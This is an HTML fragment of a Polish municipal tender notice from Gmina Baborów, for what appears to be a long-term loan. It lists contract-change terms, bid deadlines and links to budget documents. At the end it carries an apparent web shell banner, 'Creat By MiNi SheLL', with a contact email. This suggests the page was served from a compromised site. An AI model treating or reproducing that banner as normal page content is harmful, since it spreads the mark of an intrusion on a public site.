sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Opisane w dziale XXII SWZ<br/><br/>Zamawiający na podstawie art. 455 ustawy Pzp przewiduje możliwość dokonania zmiany postanowień umowy w następujących przypadkach:<br/>1) w zakresie zmiany wynagrodzenia w sytuacji zmiany:<br/>a)	stawki podatku od towarów i usług,<br/>b)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art.2 ust. 3-5<br/>ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (t.j. Dz. U.<br/>z 2017 r. poz. 847.),<br/>c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenie społeczne i zdrowotne<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>2) w zakresie zmiany terminu spłaty raty kapitałowej lub odsetkowej w razie trudności w realizacji strony dochodowej budżetu, wcześniejszej spłaty kredytu.<br/><br/>Nie stanowi zmiany umowy w rozumieniu art. 454 ustawy Prawo zamówień publicznych: zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy, zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-06 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający udostępnia następujące dokumenty niezbędne do przygotowania oferty:<br/>1.Projekt budżetu oraz Wieloletniej Prognozy Finansowej na 2021 r. wraz z opiniami RIO<br/>2. Budżet Gminy Baborów na 2021 r. <br/>3. Wieloletnia Prognoza Finansowa na 2021 r.<br/>4. Uchwała RIO nr 450/2020 w sprawie opinii o możliwości sfinansowania deficytu budżetu przez Gminę Baborów w 2021 r.<br/><br/>W/w załączniki do SWZ, są do pobrania na stronie BIP Zamawiającego pod adresem: http://bip.baborow.pl/4419/2761/budzet-2021.html<br/><br/>6. Uchwała Rady Miejskiej nr XX/241/21 z 30 czerwca 2021 r. w sprawie zmiany wieloletniej prognozy finansowej <br/>7. Uchwała Rady Miejskiej nr XX/240/21 z 30 czerwca 2021r. w sprawie zmiany uchwały budżetowej oraz wprowadzenia zmian do budżetu Gminy Baborów na 2021 r.<br/>8. Uchwała Rady Miejskiej nr XXI/247/21 z 26 lipca 2021 r. w sprawie zmiany wieloletniej prognozy finansowej <br/>9. Uchwała Rady Miejskiej nr XXI/246/21 w sprawie zmiany uchwały budżetowej oraz wprowadzenia zmian do budżetu Gminy Baborów na 2021 r.<br/>10. Zarządzenie NR OW-249/21 Burmistrza Gminy Baborów z dnia 18 sierpnia 2021 w sprawie zaciągnięcia w 2021 r. kredytu długoterminowego<br/><br/>W/w załączniki do SWZ, są do pobrania na stronie BIP Zamawiającego pod adresem:<br/>https://prawomiejscowe.pl/UrzadMiejskiwBaborowie/tabBrowser/legislativeBodies/518/Rada-Miejska-w-Baborowie/2159/VIII-Kadencja-(2018---2023)<br/>https://prawomiejscowe.pl/UrzadMiejskiwBaborowie/tabBrowser/legislativeBodies/519/Burmistrz-Gminy-Babor%C3%B3w/2179/V-Kadencja-(2018-2023)<br/><br/>11. Sprawozdanie Rb-NDS - 2021r,<br/>12. Sprawozdanie Rb-N – 2021 r,<br/>13. Sprawozdanie Rb-27S – 2021 r,<br/>14. Sprawozdanie Rb-28S – 2021 r,<br/>15. sprawozdania z wykonania budżetu wraz z opiniami RIO<br/><br/>są udostępniane na stronie BIP Zamawiającego pod adresem: <br/>http://bip.baborow.pl/4528/2761/wykonanie-budzetu-2021.html<br/><br/>14. Sprawozdanie Rb-Z – 2021 r.<br/><br/>jest udostępniane na stronie BIP Zamawiającego pod adresem: <br/>http://bip.baborow.pl/4527/2761/dlug-publiczny-2021.html<br/><br/>15. sprawozdania kwartalne, sprawozdania z wykonania budżetu wraz z opiniami RIO za lata poprzedzające rok 2021 dostępne są:<br/>http://bip.baborow.pl/1022/1173/dane-ogolne.html w zakładce Finanse - Budżet archiwum – w zakładkach dotyczących poszczególnych lat budżetowych.<br/><br/>Uchwała RIO w sprawie opinii o możliwości spłaty długoterminowego kredytu przez Gminę Baborów zostanie przedstawiona Bankowi udzielającego kredytu przed podpisaniem umowy.<br/><br/>Gmina informuje że nie posiada zaległych zobowiązań w bankach oraz nie posiada zaległości wobec ZUS oraz US.<br/><br/>Gmina informuje, że nie złoży oświadczenia o poddaniu się egzekucji, zgodnie z art. 777 k.p.c.<br/><br/>Gmina informuje, że na jej rachunkach w bankach nie ciążą żadne zajęcia egzekucyjne oraz nie był prowadzony program postępowania naprawczego.<br/>W okresie 2018 r. – 2021 r. Rada Miejska podjęła uchwały o udzieleniu absolutorium Burmistrzowi Gminy.<br/>Gmina nie udzieliła poręczeń i gwarancji i nie posiada z tego tytułu zobowiązań.<br/>Wśród podmiotów powiązanych z Gminą nie występują żadne placówki medyczne.

Creat By MiNi SheLL
Email: jattceo@gmail.com